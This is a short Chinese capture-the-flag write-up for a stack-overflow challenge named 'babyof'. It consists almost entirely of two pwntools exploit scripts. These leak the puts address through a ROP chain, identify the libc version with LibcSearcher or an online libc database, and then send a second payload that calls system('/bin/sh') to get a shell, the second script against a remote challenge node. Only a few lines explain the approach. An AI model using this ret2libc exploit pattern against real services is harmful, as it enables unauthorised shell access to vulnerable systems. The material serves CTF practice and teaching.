朴实无华的栈溢出,没有system函数,也没有/bin/sh字符串,也没有给libc文件
但是我们有puts可以泄露数据
from pwn import *
from LibcSearcher import *
context(arch="amd64")
io = process('./babyof')
elf = ELF('./babyof')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x40066b
pop_rdi_ret = 0x400743
ret_addr = 0x400506
payload = flat([b'A'*0x48,pop_rdi_ret,puts_got,puts_plt,main_addr])
io.recvline()
io.sendline(payload)
io.recvuntil('I hope you win\n')
puts_addr = int(unpack(io.recvuntil('\n',drop=True).ljust(8,b'\x00')))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')
payload2 = flat([b'A'*0x48,pop_rdi_ret,bin_sh,system_addr])
io.sendline(payload2)
io.interactive()
这是通过libcsearcher获取偏移的代码,可惜在这题好像行不通,但是思路是这样子的
通过泄露目标的函数地址,我可以确定目标使用的是这两个libc文件
libc database search (blukat.me)
然后是修改过后的代码,基本上没差
from pwn import *
from LibcSearcher import *
context(arch="amd64")
#io = process('./babyof')
io = remote('node4.anna.nssctf.cn',28711)
elf = ELF('./babyof')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
read_got = elf.got['read']
setvbuf = elf.got['setvbuf']
main_addr = 0x40066b
pop_rdi_ret = 0x400743
ret_addr = 0x400506
payload = flat([b'A'*0x48,pop_rdi_ret,puts_got,puts_plt,main_addr])
io.recvline()
io.sendline(payload)
io.recvuntil('I hope you win\n')
puts_addr = int(unpack(io.recvuntil('\n',drop=True).ljust(8,b'\x00')))
print(hex(puts_addr))
libc_puts = 0x80aa0
libc_base = puts_addr - libc_puts
system_addr = libc_base + 0x4f550
bin_sh = libc_base + 0x1b3e1a
payload2 = flat([b'A'*0x48,ret_addr,pop_rdi_ret,bin_sh,system_addr])
io.sendline(payload2)
io.interactive()